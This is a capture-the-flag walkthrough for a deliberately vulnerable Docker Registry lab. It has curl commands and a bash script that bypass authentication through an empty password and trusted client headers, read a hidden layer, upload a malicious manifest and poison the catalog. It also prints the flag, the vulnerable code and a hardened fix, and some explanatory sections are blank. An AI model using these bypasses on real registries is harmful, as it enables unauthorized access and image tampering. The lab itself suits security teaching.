A Docker registry management platform implements the Registry API v2 with enterprise security features for container image storage and distribution. But when authentication mechanisms meet implementation flaws, even the most secure registries can leak their most sensitive layers and manifests. 🎯 Time to test your container registry exploitation skills!
curl <target-ip>/v2/secure-app/blobs/sha256:secret-layer
Docker Registry API v2 is the standard protocol for storing and distributing Docker images. It uses a RESTful API with endpoints for manifests, blobs, and catalog operations. Common vulnerabilities include weak authentication, missing access controls, and information disclosure.
- /v2/ - Registry root (version check)
- /v2/_catalog - List all repositories
- /v2/{repo}/tags/list - List tags for repository
- /v2/{repo}/manifests/{tag} - Get/Put image manifest
- /v2/{repo}/blobs/{digest} - Get blob data
Navigate to
Test Credentials:
- Username: user | Password: password123
- Username: admin | Password: admin123
Start by exploring the Docker Registry API endpoints without authentication:
# Check registry version
curl /v2/
# List repositories (should require auth)
curl /v2/_catalog
# Expected: Unauthorized or repository list
# List tags for secure-app repository
curl /v2/secure-app/tags/list
# Get manifest for latest tag
curl /v2/secure-app/manifests/latest
The registry implements vulnerable authentication that can be bypassed:
- username: (colon with empty password)
- X-Registry-Auth: bypass
- X-Admin-Access: granted
# Create malformed basic auth
echo -n "admin:" | base64
# Result: YWRtaW46
# Use bypassed auth
curl -H "Authorization: Basic YWRtaW46" /v2/_catalog
# Bypass using special header
curl -H "X-Registry-Auth: bypass" /v2/_catalog
# Access admin functions
curl -H "X-Admin-Access: granted" /registry-admin
Once authentication is bypassed, explore the registry contents:
# List all repositories
curl -H "Authorization: Basic YWRtaW46" /v2/_catalog
# Expected response:
{"repositories": ["secure-app"]}
# List tags for secure-app
curl /v2/secure-app/tags/list
# Expected response:
{"name": "secure-app", "tags": ["v1.0", "latest"]}
# Get manifest for latest tag
curl /v2/secure-app/manifests/latest
Examine the image manifest to identify blob digests and layers:
# The manifest reveals layers:
{
  "layers": [
    {"digest": "sha256:layer1"},
    {"digest": "sha256:layer2"},
    {"digest": "sha256:secret-layer"}
  ]
}
# Access blob data directly
curl /v2/secure-app/blobs/sha256:secret-layer
# This should contain the flag
# 354facca-2ae0-4eef-8e2f-042f0c8a22d2
The flag is stored in the secret layer blob:
curl /v2/secure-app/blobs/sha256:secret-layer
Expected Response:
354facca-2ae0-4eef-8e2f-042f0c8a22d2
You can also access the flag through the admin panel bypass:
?admin=true
X-Admin-Access: granted
# Access admin panel directly
curl -b cookies.txt -H "X-Admin-Access: granted" /registry-admin
# Look for flag in JSON response
#!/bin/bash
TARGET=""
# Method 1: Direct blob access
echo "[+] Attempting direct blob access..."
FLAG=$(curl -s "$TARGET/v2/secure-app/blobs/sha256:secret-layer")
echo "Flag from blob: $FLAG"
# Method 2: Authentication bypass
echo "[+] Attempting auth bypass..."
AUTH=$(echo -n "admin:" | base64)
curl -s -H "Authorization: Basic $AUTH" "$TARGET/v2/_catalog"
# Method 3: Admin panel bypass
echo "[+] Attempting admin panel access..."
curl -s -H "X-Admin-Access: granted" "$TARGET/registry-admin" | grep -o '[0-9a-f-]\{36\}'
# VULNERABLE: Weak auth validation
if ':' in decoded and decoded.endswith(':'):
    return decoded.split(':')[0]
    # Allows empty password authentication
# VULNERABLE: Header-based bypass
is_admin = (session['user'] == 'admin' or
            request.args.get('admin') == 'true' or
            request.headers.get('X-Admin-Access') == 'granted')
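The two vulnerable checks above, rewritten in hardened form as an added example (not the lab's own code). It assumes the test credentials listed on this page and a constructed salt; the function names `authenticate_basic` and `is_admin` are hypothetical.

```python
import base64
import hashlib
import hmac

def _hash(password, salt):
    # PBKDF2 so that stored values are not plaintext passwords.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

_SALT = b"example-salt"  # constructed; use a random per-user salt in practice
# Constructed credential store built from the page's test credentials.
USERS = {
    "user": (_SALT, _hash("password123", _SALT)),
    "admin": (_SALT, _hash("admin123", _SALT)),
}
ADMINS = {"admin"}

def authenticate_basic(header):
    """Return the username for a valid Basic Authorization header, else None."""
    if not header or not header.startswith("Basic "):
        return None
    try:
        decoded = base64.b64decode(header[6:], validate=True).decode("utf-8")
    except ValueError:  # covers bad base64 and bad UTF-8
        return None
    username, sep, password = decoded.partition(":")
    if not sep or not username or not password:
        return None  # "admin:" (empty password) is rejected, never trusted
    salt, expected = USERS.get(username, (_SALT, b"\x00" * 32))
    # Hash and compare in constant time even for unknown users.
    ok = hmac.compare_digest(_hash(password, salt), expected)
    return username if ok and username in USERS else None

def is_admin(session, headers=None, args=None):
    """Admin status comes only from the server-side session.

    headers and args are accepted but deliberately ignored: X-Admin-Access,
    X-Registry-Auth and ?admin=true are all client-controlled input.
    """
    return session.get("user") in ADMINS
```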
The vulnerabilities exist because:
# Upload malicious manifest
curl -X PUT -H "X-Registry-Auth: bypass" \
-H "Content-Type: application/json" \
-d '{"layers":[{"digest":"sha256:malicious"}]}' \
/v2/secure-app/manifests/evil
# Enumerate all layers
for layer in layer1 layer2 secret-layer; do
curl /v2/secure-app/blobs/sha256:$layer
done
# Poison registry catalog
curl -X PUT -H "X-Registry-Auth: bypass" \
/v2/malicious-repo/manifests/latest
Docker Registry vulnerabilities can lead to:
To secure Docker registries:
354facca-2ae0-4eef-8e2f-042f0c8a22d2 is accessible via direct blob access at /v2/secure-app/blobs/sha256:secret-layer or through the admin panel using access control bypass techniques.